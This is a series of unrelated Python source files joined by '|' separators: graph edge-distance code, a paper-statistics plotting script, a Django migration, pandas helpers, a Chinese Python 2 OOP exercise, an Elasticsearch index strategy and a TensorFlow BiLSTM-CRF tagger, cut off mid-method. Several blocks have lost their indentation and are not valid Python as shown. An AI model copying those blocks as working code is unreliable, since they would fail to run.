                for n in graph.neighbors(dest):
                    neighborhood.add((dest, n))
            neighborhoods[e] = neighborhood
        return neighborhoods

    def _get_edge_features(self, graph):
        # Feature vector per edge: [combined endpoint degree, weight].
        features = {}
        for src, dest in graph.edges():
            # Excludes the current edge
            src_deg = graph.degree(src) - 1
            dest_deg = graph.degree(dest) - 1
            weight = graph[src][dest][self.field] if self.field in graph[src][dest] else 1
            features[(src, dest)] = np.array([src_deg+dest_deg, weight])
        return features

    def _get_features_for_neighborhood(self, neighborhood, features):
        # Degree-sorted feature list, suitable for DTW comparison.
        neigh_features = [features[edge] for edge in neighborhood]
        return list(sorted(neigh_features, key=lambda t: t[0]))

    def _compute_distances(self, graph, clusters, neighborhoods, features, prev_layer_distances):
        # Structural distance of every edge to every edge in its cluster.
        distances = {}
        for edge in graph.edges():
            edge_dist = {}
            edge_features = self._get_features_for_neighborhood(neighborhoods[edge], features)
            for e in clusters[edge]:
                e_features = self._get_features_for_neighborhood(neighborhoods[e], features)
                prev_layer_dist = prev_layer_distances[edge][e] if prev_layer_distances is not None else 0
                edge_dist[e] = self._compute_distance(edge_features, e_features, prev_layer_dist)
            distances[edge] = edge_dist
        return distances

    def _compute_distance(self, nf1, nf2, prev_layer_distance):
        # fastdtw returns (distance, path); accumulate distance across layers.
        dtw_dist = fastdtw(nf1, nf2, dist=lambda x,y: np.linalg.norm(x - y))
        return prev_layer_distance + dtw_dist[0]
|
import tools
import paperInfo
import plots
import matplotlib.pyplot as plt
# -*- coding: utf-8 -*-
def allCountries(papers):
    # Pie chart of publications per country (EU grouped, top-6 threshold).
    countries = tools.countries(papers)
    filteredCountries = tools.filteredUE(countries,6)
    print(filteredCountries)
    plots.pieChart(filteredCountries,"Publications by countries")
def allFields(papers):
    # Pie chart of application fields across all papers (top-5 grouping).
    fields = tools.aplicationFields(papers)
    filteredFields = tools.filtered(fields,5)
    plots.pieChart(filteredFields,"General study fields")
def EUFields(papers):
    # Pie chart of application fields for EU-affiliated papers only.
    papersByEU = tools.getPapersByEU(papers)
    print("analized papers from UE: ",len(papersByEU))
    EUFields = tools.aplicationFields(papersByEU)
    EUfilteredFields = tools.filtered(EUFields,5)
    plots.pieChart(EUfilteredFields,"EU Study fields")
def USAFields(papers):
    # Pie chart of application fields for USA-affiliated papers only.
    papersByUSA = tools.getPapersByUSA(papers)
    print("analized papers from USA: ",len(papersByUSA))
    USAFields = tools.aplicationFields(papersByUSA)
    USAfilteredFields = tools.filtered(USAFields,5)
    plots.pieChart(USAfilteredFields,"USA Study fields ")
def allDataYear(papers):
    # Publication counts per year (from 1999 onward) for all papers.
    year = tools.publicationYear(papers)
    sortedYear = tools.sortAndFillDictionary(year)
    filteredYears = tools.filteredYear(sortedYear,1999)
    return filteredYears
def EUdataYear(papers):
    # Publication counts per year (from 1999 onward) for EU papers.
    paperByEU = tools.getPapersByEU(papers)
    year = tools.publicationYear(paperByEU)
    sortedYear = tools.sortAndFillDictionary(year)
    filteredYears = tools.filteredYear(sortedYear,1999)
    return filteredYears
def CountrydataYear(papers,country):
    # Publication counts per year (from 1999 onward) for a single country.
    papersByCountry = tools.getPapersByCountry(papers,country)
    year = tools.publicationYear(papersByCountry)
    sortedYear = tools.sortAndFillDictionary(year)
    filteredYears = tools.filteredYear(sortedYear,1999)
    return filteredYears
def dataYearCombine(papers):
    # Combined bar chart of yearly publications: all vs. EU vs. USA.
    Alldata = allDataYear(papers)
    EUdata = EUdataYear(papers)
    USAdata = CountrydataYear(papers,"USA")
    print(1,USAdata)
    plots.barChartCom2(Alldata,EUdata,USAdata,"Comparative publications by year")
def globalMedicalData(papers):
    """Pie chart of specialization within the Healthcare field, worldwide.

    Fix: removed an unused ``papersByEU = tools.countries(papers)`` local
    whose result was never read (tools.countries is used elsewhere purely as
    a query, so dropping the call should be side-effect free -- confirm).
    """
    papersByField = tools.getPapersByField(papers,"Healthcare")
    print("medical papers", len(papersByField))
    globalSpecialization = tools.specialization(papersByField)
    globalSpecializationGrouped = tools.filtered(globalSpecialization,6)
    plots.pieChart(globalSpecializationGrouped,"global healthcare specialization")
def EUMedicalData(papers):
    # Pie chart of Healthcare specialization for EU papers.
    # (Typo "pecialization" lives in the chart title string -- left as is
    # since it is runtime output.)
    papersByEU = tools.getPapersByEU(papers)
    papersByField = tools.getPapersByField(papersByEU,"Healthcare")
    print("EU medical papers", len(papersByField))
    globalSpecialization = tools.specialization(papersByField)
    globalSpecializationGroped = tools.filtered(globalSpecialization,5)
    plots.pieChart(globalSpecializationGroped,"UE healthcare pecialization")
def USAMedicalData(papers):
    # Pie chart of Healthcare specialization for USA papers.
    # (The local is named papersByEU but holds USA papers -- misleading name.)
    papersByEU = tools.getPapersByUSA(papers)
    papersByField = tools.getPapersByField(papersByEU,"Healthcare")
    print("USA medical papers", len(papersByField))
    globalSpecialization = tools.specialization(papersByField)
    globalSpecializationGroped = tools.filtered(globalSpecialization,1)
    plots.pieChart(globalSpecializationGroped,"USA healthcare specialization")
def medicalCountries(paper):
    # Pie chart of countries publishing Healthcare papers.
    papersByField = tools.getPapersByField(paper,"Healthcare")
    print("medical papers", len(papersByField))
    #filteredCountries = tools.filteredUE(countries,3)
    #plots.pieChart(filteredCountries,"Publications by countries")
    countries = tools.countries(papersByField)
    filteredCountries = tools.filteredUE(countries,1)
    plots.pieChart(filteredCountries,"Publications by countries")
def technologyData(paper):
    # Venn diagram of VR / AR overlap (papers tagged with both contain ",").
    paperVR = tools.filterByTechnology(paper,"VR")
    paperAR = tools.filterByTechnology(paper,"AR")
    # NOTE(review): paperMR is computed but never used -- MR is missing from
    # the Venn diagram; confirm whether it should be included.
    paperMR = tools.filterByTechnology(paper,"MR")
    paperBoth = tools.filterByTechnology(paper,",")
    plots.vennDiagram(paperVR,paperAR,paperBoth)
if __name__== "__main__":
papers = tools.importPapers("data.tsv")
plots.publicationEvolution()
#technologyData(papers)
#healthCarePapers= tools.getPapersByField(papers,"Healthcare")
#technologyData(healthCarePapers)
# for a in paperDouble:
# print(a.name, a.technology)
#allCountries(papers)
#print("general data")
#allFields(papers)
#EUFields(papers)
#USAFields(papers)
#dataYearCombine(papers)
#print("medical data")
#globalMedicalData(papers)
#EUMedicalData(papers)
#USAMedicalData(papers)
#medicalCountries(papers)
|
# Generated by Django 3.1 on 2020-09-01 19:44
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated (Django 3.1): widen gazcountermodel.unit_price to
    DecimalField(max_digits=1000, decimal_places=2, default=1.3) and drop the
    GazCounterUnitPriceModel table."""

    dependencies = [
        ('gaz_counter', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='gazcountermodel',
            name='unit_price',
            field=models.DecimalField(decimal_places=2, default=1.3, max_digits=1000),
        ),
        migrations.DeleteModel(
            name='GazCounterUnitPriceModel',
        ),
    ]
|
'''
A collection of functions for DS8-Unit3-Sprint1
'''
import pandas
import numpy as np
def train_val_test_split(df, test_size=0.2, val_size=0.2):
    '''
    Split *df* into three random, non-overlapping DataFrames.

    A test set of ``round(test_size * len(df))`` rows is sampled first;
    a validation set of ``round(val_size * len(df))`` rows is then
    sampled from the remaining rows, and everything left over becomes
    the training set.

    df        : pandas DataFrame to split
    test_size : fraction of df used for the test set (default 0.2)
    val_size  : fraction of df used for the validation set (default 0.2)

    Returns (train, val, test).

    Example: train, val, test = train_val_test_split(df=pd.DataFrame,
                                                     test_size=0.3, val_size=0.2)
    '''
    n_total = len(df)
    n_test = round(test_size * n_total)
    n_val = round(val_size * n_total)
    test = df.sample(n_test)
    remainder = df.drop(test.index)
    val = remainder.sample(n_val)
    train = remainder.drop(val.index)
    return train, val, test
def is_null(df, sum=False):
    '''
    Report the null (NaN/None) cells of a DataFrame.

    df  : pandas DataFrame to inspect
    sum : if truthy, return per-column null counts instead of the
          element-wise boolean DataFrame (default False)
    '''
    # NOTE: the parameter name shadows builtin sum(); kept unchanged so
    # keyword callers (sum=True) are not broken.
    # pandas' isnull() also recognises None in object columns, which the
    # previous (df != df) NaN self-inequality trick could miss.
    nulls = df.isnull()
    if sum:
        return nulls.sum()
    return nulls
def iqr_outliers(x, constant=1.5):
    '''
    Remove outliers from *x* using Tukey's IQR fences.

    Values at or beyond ``Q1 - constant*IQR`` / ``Q3 + constant*IQR`` are
    reported via print and dropped; the remaining values are returned as a
    sorted list.
    '''
    values = np.sort(np.array(x))
    q1 = np.percentile(values, 25)
    q3 = np.percentile(values, 75)
    spread = (q3 - q1) * constant
    lower, upper = q1 - spread, q3 + spread
    kept = []
    for item in values.tolist():
        if item <= lower:
            print(f'{item} is a low outlier')
        elif item >= upper:
            print(f'{item} is a high outlier')
        else:
            kept.append(item)
    print('List without outliers:')
    return kept
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# 什么是面向对象
#需求
# - 老妈的交通工具有两个,电动车和自行车
# - 家里离菜场共 20 公里
# - 周一的时候骑电动车去买菜,骑了 0.5 小时
# - 周二的时候骑自行车去卖菜,骑了 2 小时
# - 周三的时候骑电动车去卖菜,骑了 0.6 小时
# - 分别输出三天骑行的平均速度
# def main():
# distance = 20
# e_bicycle = '电动车'
# bicycle = '自行车'
# day1 = '周一'
# hour1 = 0.5
# speed1 = 20/hour1
# print '%s 骑 %s 平均时速 %0.2f km/h' %(day1,e_bicycle, speed1)
# day2 = '周二'
# hour2 = 2
# speed2 = 20/hour2
# print '%s 骑 %s 平均时速 %0.2f km/h' %(day2,bicycle,speed2)
# day3 = '周三'
# hour3 = 0.6
# speed3 = 20/hour3
# print '%s 骑 %s 平均时速 %0.2f km/h' %(day3, e_bicycle, speed3)
class tool():
    """A means of transport plus one trip: the day it was used and the hours ridden."""
    def __init__(self, category, day, hour):
        # category: vehicle name (e.g. electric bike / bicycle)
        # day: weekday label of the trip
        # hour: riding time in hours
        self.category = category
        self.day = day
        self.hour = hour
    def be_drived(self, distance):
        # Print the average speed for a trip of `distance` kilometres.
        speed = distance/self.hour
        print '%s 骑 %s 平均时速 %0.2f km/h '% (self.day, self.category, speed)
def main():
    # Three trips to the market 20 km away: electric bike on Monday (0.5 h),
    # bicycle on Tuesday (2 h), electric bike on Wednesday (0.6 h).
    tool1 = tool('电动车','周一', 0.5)
    # tool1.be_drived(20)
    tool2 = tool('自行车', '周二', 2)
    # tool2.be_drived(20)
    tool3 = tool('电动车', '周三', 0.6)
    # tool3.be_drived(20)
    lst = [tool1, tool2, tool3]
    # Print the average speed of each trip.
    for lst_item in lst:
        lst_item.be_drived(20)
# Script entry point.
if __name__ == '__main__':
    main()
|
import json
import elasticsearch8
from share import models as db
from share.search import exceptions
from share.search.index_strategy.elastic8 import Elastic8IndexStrategy
from share.search import messages
from share.util import IDObfuscator
from share.util.checksum_iris import ChecksumIri
class Sharev2Elastic8IndexStrategy(Elastic8IndexStrategy):
    """Index strategy keeping the legacy "sharev2" document shape on an
    Elasticsearch 8 cluster."""
    # Checksum identifying the current settings/mappings of this strategy;
    # presumably updated whenever those change -- confirm with the base class.
    CURRENT_STRATEGY_CHECKSUM = ChecksumIri(
        checksumalgorithm_name='sha-256',
        salt='Sharev2Elastic8IndexStrategy',
        hexdigest='bcaa90e8fa8a772580040a8edbedb5f727202d1fca20866948bc0eb0e935e51f',
    )
    # abstract method from IndexStrategy
    @property
    def supported_message_types(self):
        # Handles both live indexing and backfill messages, keyed by suid.
        return {
            messages.MessageType.INDEX_SUID,
            messages.MessageType.BACKFILL_SUID,
        }
    # abstract method from Elastic8IndexStrategy
    def index_settings(self):
        """Index settings: a default analyzer that also strips HTML, plus
        analyzers for '|'-delimited hierarchical subject paths."""
        return {
            'analysis': {
                'analyzer': {
                    'default': {
                        # same as 'standard' analyzer, plus html_strip
                        'type': 'custom',
                        'tokenizer': 'standard',
                        'filter': ['lowercase', 'stop'],
                        'char_filter': ['html_strip']
                    },
                    'subject_analyzer': {
                        'type': 'custom',
                        'tokenizer': 'subject_tokenizer',
                        'filter': [
                            'lowercase',
                        ]
                    },
                    # at search time the whole query is treated as one subject
                    # path (keyword tokenizer), lowercased to match indexing
                    'subject_search_analyzer': {
                        'type': 'custom',
                        'tokenizer': 'keyword',
                        'filter': [
                            'lowercase',
                        ]
                    },
                },
                'tokenizer': {
                    # path_hierarchy emits each prefix of 'a|b|c' as a token
                    'subject_tokenizer': {
                        'type': 'path_hierarchy',
                        'delimiter': '|',
                    }
                }
            }
        }
    # abstract method from Elastic8IndexStrategy
    def index_mappings(self):
        """Static field mappings for the sharev2 document shape.

        Most text fields carry an 'exact' keyword sub-field so they can be
        both full-text searched and matched/aggregated verbatim.
        """
        exact_field = {
            'exact': {
                'type': 'keyword',
                # From Elasticsearch documentation:
                # The value for ignore_above is the character count, but Lucene counts bytes.
                # If you use UTF-8 text with many non-ASCII characters, you may want to set the limit to 32766 / 3 = 10922 since UTF-8 characters may occupy at most 3 bytes
                'ignore_above': 10922
            }
        }
        return {
            # dynamic=False: unknown top-level fields are stored but not indexed
            'dynamic': False,
            'properties': {
                'affiliations': {'type': 'text', 'fields': exact_field},
                'contributors': {'type': 'text', 'fields': exact_field},
                'date': {'type': 'date', 'format': 'strict_date_optional_time'},
                'date_created': {'type': 'date', 'format': 'strict_date_optional_time'},
                'date_modified': {'type': 'date', 'format': 'strict_date_optional_time'},
                'date_published': {'type': 'date', 'format': 'strict_date_optional_time'},
                'date_updated': {'type': 'date', 'format': 'strict_date_optional_time'},
                'description': {'type': 'text'},
                'funders': {'type': 'text', 'fields': exact_field},
                'hosts': {'type': 'text', 'fields': exact_field},
                'id': {'type': 'keyword'},
                'identifiers': {'type': 'text', 'fields': exact_field},
                'justification': {'type': 'text'},
                'language': {'type': 'keyword'},
                'publishers': {'type': 'text', 'fields': exact_field},
                'registration_type': {'type': 'keyword'},
                'retracted': {'type': 'boolean'},
                'source_config': {'type': 'keyword'},
                'source_unique_id': {'type': 'keyword'},
                'sources': {'type': 'keyword'},
                'subjects': {'type': 'text', 'analyzer': 'subject_analyzer', 'search_analyzer': 'subject_search_analyzer'},
                'subject_synonyms': {'type': 'text', 'analyzer': 'subject_analyzer', 'search_analyzer': 'subject_search_analyzer', 'copy_to': 'subjects'},
                'tags': {'type': 'text', 'fields': exact_field},
                'title': {'type': 'text', 'fields': exact_field},
                'type': {'type': 'keyword'},
                'types': {'type': 'keyword'},
                'withdrawn': {'type': 'boolean'},
                'osf_related_resource_types': {'type': 'object', 'dynamic': True},
                'lists': {'type': 'object', 'dynamic': True},
            },
            # string fields nested under 'lists' get the same text+exact shape
            'dynamic_templates': [
                {'exact_field_on_lists_strings': {'path_match': 'lists.*', 'match_mapping_type': 'string', 'mapping': {'type': 'text', 'fields': exact_field}}},
            ]
        }
# abstract method from Elastic8IndexStrategy
def build_elastic_actions(self, messages_chunk: messages.MessagesChunk):
suid_ids = set(messages_chunk.target_ids_chunk)
record_qs = db.FormattedMetadataRecord.objects.filter(
suid_id__in=suid_ids,
record_format='sharev2_elastic',
)
for record in record_qs:
suid_ids.discard(record.suid_id)
source_doc = json.loads(record.formatted_metadata)
if source_doc.pop('is_deleted', False):
yield self._build_delete_action(record.suid_id)
else:
yield self._build_index_action(record.suid_id, source_doc)
# delete any that don't have the expected FormattedMetadataRecord
for leftover_suid_id in suid_ids:
yield self._build_delete_action(leftover_suid_id)
    # override Elastic8IndexStrategy
    def get_doc_id(self, message_target_id):
        # Suid primary key -> obfuscated public elasticsearch document id.
        return IDObfuscator.encode_id(message_target_id, db.SourceUniqueIdentifier)
    # override Elastic8IndexStrategy
    def get_message_target_id(self, doc_id):
        # Obfuscated document id -> suid primary key (inverse of get_doc_id).
        return IDObfuscator.decode_id(doc_id)
def _build_index_action(self, target_id, source_doc):
return {
'_op_type': 'index',
'_id': self.get_doc_id(target_id),
'_source': source_doc,
}
def _build_delete_action(self, target_id):
return {
'_op_type': 'delete',
'_id': self.get_doc_id(target_id),
}
    class SpecificIndex(Elastic8IndexStrategy.SpecificIndex):
        # optional method from IndexStrategy.SpecificIndex
        def pls_handle_query__sharev2_backcompat(self, request_body=None, request_queryparams=None) -> dict:
            """Forward a sharev2-era search request to ES8 and reshape the
            response for limited elasticsearch5 compatibility."""
            es8_request_body = {
                **(request_body or {}),
                # always report the exact hit count, not ES8's default cap
                'track_total_hits': True,
            }
            try:
                json_response = self.index_strategy.es8_client.search(
                    index=self.indexname,
                    # NOTE: the `body` param is deprecated; remove this backcompat method by ES9
                    body=es8_request_body,
                    params=request_queryparams or {},
                )
            except elasticsearch8.TransportError as error:
                raise exceptions.IndexStrategyError() from error # TODO: error messaging
            try: # mangle response for some limited backcompat with elasticsearch5
                # ES8 reports hits.total as {'value': N, 'relation': ...};
                # ES5-era clients expect a bare integer there.
                es8_total = json_response['hits']['total']
                json_response['hits']['total'] = es8_total['value']
                json_response['hits']['_total'] = es8_total
            except KeyError:
                pass
            return json_response
|
#!/cs/puls/Projects/business_c_test/env/bin/python3
# -*- coding: utf-8 -*-
import tensorflow as tf
import os, sys
import numpy as np
from tqdm import trange
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
from sklearn.metrics import classification_report
from gensim.models import KeyedVectors
from gensim.test.utils import datapath, get_tmpfile
from gensim.scripts.glove2word2vec import glove2word2vec
class BiLSTM():
    """Bidirectional-LSTM sequence labeller (NER) built on TensorFlow 1.x.

    Features per token: pretrained word embeddings, casing class, character
    CNN/LSTM embeddings and (multi-hot) POS tags; classified per token by
    softmax or a CRF layer.
    """
    def __init__(self, params=None, encoded_dataset=None, raw_dataset=None, word2Idx=None):
        """Configure the model and (optionally) build the TF graph.

        params          : dict of overrides merged into the defaults below
                          (nested dicts are merged one level deep)
        encoded_dataset : already-encoded dataset (used as-is)
        raw_dataset     : raw dataset, encoded via setRawDataset()
        word2Idx        : existing token->index map; when given, embeddings
                          are not loaded and __init__ returns early after
                          rebuilding char2Idx (used by loadModel())
        """
        self.embeddings = None
        # BUGFIX: the original signature used a mutable default (word2Idx={})
        # which loadWordEmbedding() then mutated, leaking vocabulary between
        # instances; use None as the sentinel instead.
        self.word2Idx = {} if word2Idx is None else word2Idx
        self.charEmbeddings = None
        self.char2Idx = {}
        self.session = None
        self.datagenerator = None
        # Maps feature names to the graph-building method for that input branch.
        self.featureMap = {'tokens': self.tokenInput, 'casing': self.casingInput,
                           'character': self.charInput, 'pos': self.posInput}
        # Hyperparameters for the network
        defaultParams = {'epoch': 1, 'miniBatchSize': 50,
                         'modelSavePath': '/cs/puls/Resources/models/English',
                         'dropout': (0.25, 0.25),
                         'embedding': "/cs/puls/Resources/embeddings/Finnish/fin-word2vec-lemma-100.bin",
                         'classifier': 'crf',
                         'crf': {
                             'learn-mode': 'join',
                             'test-mode': 'marginal'
                         },
                         'LSTM-Size': (100, 100),
                         'casingEntries': ['PADDING', 'other', 'numeric', 'mainly_numeric', 'allLower',
                                           'allUpper', 'mainly_allUpper', 'initialUpper', 'contains_upper',
                                           'contains_digit'],
                         'posEntries': ['PADDING', 'other', 'Noun', 'Verb', 'Adj', 'Adv', 'Pron', 'Conj', 'Interj',
                                        'Num', 'Punct', 'UNKNOWN'],
                         'charEntries': " 0123456789abcdefghijklmnopqrstuvwxyzäöåABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÅ" + \
                                        ".,-_()[]{}!?:;#'\"/\\%$`&=*+@^~|\u2013\u2014\u201C\u201D",
                         'labelEntries': ['B-PER', 'B-LOC', 'B-ORG', 'B-PRO', 'B-OTH',
                                          'I-PER', 'I-LOC', 'I-ORG', 'I-PRO', 'I-OTH', 'O'],
                         'character': {
                             'charEmbeddings': 'cnn',
                             'charEmbeddingsSize': 30,
                             'charFilterSize': 30,
                             'charFilterLength': 3,
                             'charLSTMSize': 30,
                             'maxCharLength': 50,
                         },
                         'casing': {
                             'num_units': 30,
                             'activation': 'relu',
                             'dropout': 0.2
                         },
                         'pos': {
                             'num_units': 30,
                             'activation': 'relu',
                             'dropout': 0.2
                         },
                         'optimizer': {
                             'type': 'adam',
                             'clipvalue': 0,
                             'clipnorm': 1,
                         },
                         'earlyStopping': 5,
                         'featureNames': ['tokens', 'casing', 'character', 'pos'],
                         'addFeatureDimensions': 10}
        self.activation_map = {
            'relu': tf.nn.relu,
            'tanh': tf.nn.tanh,
            'sigmoid': tf.nn.sigmoid,
            'softmax': tf.nn.softmax,
        }
        # Merge caller overrides into the defaults (one level of nesting).
        if params is not None:
            for k, v in params.items():
                if isinstance(v, dict):
                    for kk, vv in v.items():
                        defaultParams[k][kk] = vv
                else:
                    defaultParams[k] = v
        self.params = defaultParams
        self.dataset = {}
        if 'tokens' in self.params['featureNames'] and not len(self.word2Idx):
            self.loadWordEmbedding()
        elif len(self.word2Idx):
            # A vocabulary was supplied (model reload): just rebuild char2Idx
            # and skip embedding/graph construction.
            self.char2Idx = {"PADDING": 0, "UNKNOWN": 1}
            self.char2Idx.update({char: i + len(self.char2Idx)
                                  for i, char in enumerate(self.params['charEntries'])})
            return
        self.loadCharEmbedding()
        if raw_dataset and encoded_dataset is None:
            self.setRawDataset(raw_dataset)
            self.buildModel()
        if encoded_dataset:
            self.setDataset(encoded_dataset)
            self.buildModel()
    def loadCharEmbedding(self):
        """Build char2Idx and a random character-embedding matrix.

        Row 0 (PADDING) is all zeros; row 1 (UNKNOWN) and all character rows
        are drawn uniformly from [-limit, limit].
        """
        self.char2Idx = {"PADDING": 0, "UNKNOWN": 1}
        # Zero row for padding.
        self.charEmbeddings = np.zeros(self.params['character']['charEmbeddingsSize'])
        # Uniform bound sqrt(3/d) -- presumably a variance-scaling init; confirm.
        limit = np.sqrt(3.0 / self.params['character']['charEmbeddingsSize']) # Why?
        self.charEmbeddings = np.vstack((self.charEmbeddings,
                                         np.random.uniform(-limit, limit,
                                                           self.params['character']['charEmbeddingsSize'])))
        # One random row per known character, in charEntries order.
        for _ in self.params['charEntries']:
            self.char2Idx[_] = len(self.char2Idx)
            self.charEmbeddings = np.vstack((self.charEmbeddings,
                                             np.random.uniform(-limit, limit,
                                                               self.params['character']['charEmbeddingsSize'])))
def loadWordEmbedding(self):
print('Loading Embedding Matrix...')
if 'glove' in self.params['embedding'].lower():
glove_file = datapath(self.params['embedding'])
tmp_file = get_tmpfile('glove2vec.txt')
glove2word2vec(glove_file, tmp_file)
embedding = KeyedVectors.load_word2vec_format(tmp_file, binary=False)
else:
embedding = KeyedVectors.load_word2vec_format(self.params['embedding'], binary=True)
# Add padding+unknown
self.word2Idx["PADDING_TOKEN"] = len(self.word2Idx)
self.embeddings = np.zeros(embedding.syn0.shape[1])
self.word2Idx["AMBIGUOUS_TOKEN"] = len(self.word2Idx)
self.embeddings = np.vstack((np.random.uniform(-0.25, 0.25, embedding.syn0.shape[1]), self.embeddings))
self.word2Idx["UNKNOWN_TOKEN"] = len(self.word2Idx)
self.embeddings = np.vstack((np.random.uniform(-0.25, 0.25, embedding.syn0.shape[1]), self.embeddings))
self.embeddings = np.vstack((self.embeddings, embedding.syn0))
temp = len(self.word2Idx)
self.word2Idx.update({v:k + temp for k,v in enumerate(embedding.index2word)})
    def tokenInput(self, sentence_length=None):
        """Word-embedding input branch: int token-id placeholder looked up in
        a frozen embedding matrix. Returns (placeholder, output tensor)."""
        tokens_input = tf.placeholder(tf.int32, [None, None], name='tokens_input')
        # Embedding matrix is frozen (trainable=False).
        W = tf.Variable(self.embeddings, trainable=False, name="W_token")
        tokens = tf.nn.embedding_lookup(W, tokens_input, name='tokens')
        # Free the (large) numpy copy once it has been captured by the graph.
        del self.embeddings
        tokens = tf.cast(tokens, tf.float64)
        print('Embedding Shape:', tokens.shape)
        '''
        tokens_input = Input(shape=(None,), name='words_input')
        tokens = Embedding(input_dim=self.embeddings.shape[0], output_dim=self.embeddings.shape[1],
                           weights=[self.embeddings], trainable=False, name='word_embeddings')(tokens_input)
        '''
        return tokens_input, tokens
    def casingInput(self, sentence_length=None):
        """Casing-class input branch: casing-id placeholder looked up in a
        small trainable embedding. Returns (placeholder, output tensor)."""
        casing_input = tf.placeholder(tf.int32, [None, None],name='casing_input')
        W = tf.Variable(tf.random_uniform([len(self.params['casingEntries']),
                                           self.params['addFeatureDimensions']], -1.0, 1.0), name="W_case")
        casings = tf.nn.embedding_lookup(W, casing_input, name='casings')
        casings = tf.cast(casings, tf.float64)
        print('Casing Shape:', casings.shape)
        '''
        casing_input = Input(shape=(None, ),name='casing_input')
        casings = Embedding(input_dim=len(self.params['casingEntries']),
                            output_dim=self.params['addFeatureDimensions'], name='casings')(casing_input)
        '''
        return casing_input, casings
def posInput(self, sentence_length=None):
pos_input = tf.placeholder(tf.int32, [None, None, len(self.params['posEntries'])], name='pos_input')
#pos = tf.reshape(pos_input, [-1, len(self.params['posEntries'])])
pos = tf.layers.Dense(self.params['pos']['num_units'],
activation=self.activation_map[self.params['casing']['activation']],
name='pos_dense')(pos_input)
if self.params['pos'].get('dropout'):
pos = tf.layers.Dropout(self.params['pos'].get('dropout'), name='pos_dropout')(pos)
pos = tf.cast(pos, tf.float64)
print('POS Shape:', pos.shape)
'''
pos_input = Input(shape=(None, len(self.params['posEntries'])), name='pos_input')
pos = Dense(self.params['pos']['num_units'],
activation=self.params['casing']['activation'], name='pos_dense')(pos_input)
if self.params['pos'].get('dropout'):
pos = Dropout(self.params['casing'].get('dropout'), name='pos_dropout')(pos)
'''
return pos_input, pos
    def charInput(self, sentence_length=None):
        """Character input branch: per-word char-id placeholder embedded and
        reduced by either a BiLSTM or a CNN + max-pool.

        Returns (placeholder, output tensor).
        """
        chars_input = tf.placeholder(tf.int32, [None, None, self.params['character']['maxCharLength']], name='chars_input')
        # chars_input = Input(shape=(None, self.params['character']['maxCharLength']), name='char_input')
        # NOTE(review): W is initialised from random_uniform with only the
        # *shape* of self.charEmbeddings -- the values prepared in
        # loadCharEmbedding() are never used here; confirm intentional.
        W = tf.Variable(tf.random_uniform([self.charEmbeddings.shape[0],
                                           self.charEmbeddings.shape[1]], -1.0, 1.0), name="W_char")
        chars = tf.nn.embedding_lookup(W, chars_input, name='char_emd')
        if self.params['character']['charEmbeddings'].lower() == 'lstm':
            # BiLSTM over characters; fw/bw final outputs are concatenated.
            lstm_fw_cell = tf.nn.rnn_cell.LSTMCell(self.params['character']['charLSTMSize'])
            lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(self.params['character']['charLSTMSize'])
            (output_fw, output_bw), _ = \
                tf.nn.bidirectional_dynamic_rnn(lstm_fw_cell, lstm_bw_cell, chars,dtype=tf.float32)
            chars = tf.concat([output_fw, output_bw], axis=-1)
            chars = tf.reshape(chars, [-1, sentence_length, self.params['character']['charLSTMSize']*2])
            '''
            # Use LSTM for char embeddings from Lample et al., 2016
            chars = TimeDistributed(
                Embedding(input_dim=self.charEmbeddings.shape[0], output_dim=self.charEmbeddings.shape[1],
                          weights=[self.charEmbeddings], trainable=True, mask_zero=True), name='char_emd')(chars_input)
            charLSTMSize = self.params['character']['charLSTMSize']
            chars = TimeDistributed(Bidirectional(LSTM(charLSTMSize, return_sequences=False)), name="char_lstm")(chars)
            '''
        else:
            # CNN over characters followed by max-pooling over positions.
            charFilterSize = self.params['character']['charFilterSize']
            charFilterLength = self.params['character']['charFilterLength']
            charsFilter = tf.Variable(tf.random_normal([1, charFilterLength,
                                                        self.charEmbeddings.shape[1], charFilterSize]))
            chars = tf.nn.conv2d(chars, charsFilter, strides=[1, 1, 1, 1], padding='SAME', name='char_cnn')
            chars = tf.reduce_max(chars, axis=-2, name="char_pooling")
            '''
            # Use CNNs for character embeddings from Ma and Hovy, 2016
            chars = TimeDistributed(
                Embedding(input_dim=self.charEmbeddings.shape[0], output_dim=self.charEmbeddings.shape[1],
                          weights=[self.charEmbeddings], trainable=True, mask_zero=False), name='char_emd')(chars_input)
            charFilterSize = self.params['character']['charFilterSize']
            charFilterLength = self.params['character']['charFilterLength']
            chars = TimeDistributed(Conv1D(charFilterSize, charFilterLength, padding='same'), name="char_cnn")(chars)
            chars = TimeDistributed(GlobalMaxPooling1D(), name="char_pooling")(chars)
            chars = TimeDistributed(Masking(mask_value=0), name="char_mask")(chars)
            '''
        chars = tf.cast(chars, tf.float64)
        print('CharEmbedding Shape:', chars.shape)
        # The numpy matrix is no longer needed once the graph is built.
        del self.charEmbeddings
        #chars = tf.reshape(chars, [-1, tf.shape(chars_input)[-2], tf.shape(chars)[-1]])
        return chars_input, chars
    def buildModel(self):
        """Build the full TF1 graph: feature branches -> stacked BiLSTM ->
        softmax or CRF output, loss, precision/recall metrics and a clipped
        'train_op'. Nodes are addressed later by name (e.g. 'loss:0')."""
        tf.reset_default_graph()
        label = tf.placeholder(tf.int32, [None, None], name='label')
        sentence_length = tf.placeholder(tf.int32, [None], name='sentence_length')
        # One (placeholder, tensor) pair per enabled feature branch.
        input_nodes = [self.featureMap[_](sentence_length=sentence_length)
                       for _ in self.params['featureNames'] if _ in self.featureMap.keys()]
        merged = tf.concat([_[1] for _ in input_nodes], axis=-1)
        merged_input_shape = tf.shape(merged)
        print('Feature Concatnated:', merged.shape)
        cnt = 1
        # One stacked BiLSTM layer per entry in LSTM-Size.
        for size in self.params['LSTM-Size']:
            lstm_fw_cell = tf.nn.rnn_cell.LSTMCell(size, name="merged_fw_lstm_"+ str(cnt))
            lstm_bw_cell = tf.nn.rnn_cell.LSTMCell(size, name="merged_bw_lstm_"+ str(cnt))
            if isinstance(self.params['dropout'], (list, tuple)):
                # Variational dropout: (input_keep, state_keep) drop rates.
                lstm_fw_cell = tf.nn.rnn_cell.DropoutWrapper(lstm_fw_cell,
                                                             input_keep_prob=1 - self.params['dropout'][0],
                                                             state_keep_prob=1 - self.params['dropout'][1])
                lstm_bw_cell = tf.nn.rnn_cell.DropoutWrapper(lstm_bw_cell,
                                                             input_keep_prob=1 - self.params['dropout'][0],
